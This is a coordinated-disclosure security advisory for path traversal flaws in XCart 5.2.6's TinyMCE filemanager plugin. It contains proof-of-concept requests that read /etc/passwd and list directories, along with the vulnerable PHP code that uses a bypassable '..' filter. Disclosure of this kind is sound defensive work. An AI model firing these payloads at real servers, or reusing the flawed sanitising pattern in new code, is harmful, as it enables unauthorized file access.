Security Advisory - Curesec Research Team 1. Introduction Affected Product: XCart 5.2.6 Fixed in: 5.2.7 Fixed Version Link: https://www.x-cart.com/xc5kit Vendor Contact: support@x-cart.com Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Arbitrary File Download Description When downloading a file, the input is not properly protected against directory traversal, which makes it possible to download arbitrary files. Please note that admin credentials are required. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt Code /skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10 $path=joinPaths($root,$upload_dir,$_POST['path']); $path=str_replace(LC_DS . '..', '', $path); $name=$_POST['name']; header('Pragma: private'); header('Cache-control: private, must-revalidate'); header("Content-Type: application/octet-stream"); header("Content-Length: " .(string)(filesize($path)) ); header('Content-Disposition: attachment; filename="'.($name).'"'); readfile($path); 3. List Directories Description It is possible to list the directories contained by any directory due to a directory traversal vulnerability via the fldr POST argument. This may be used to gather information about the target system. Please note that admin credentials are required. Proof of Concept http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../ 4. Solution To mitigate this issue please upgrade at least to version 5.2.7: https://www.x-cart.com/xc5kit Please note that a newer version might already be available. 5. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html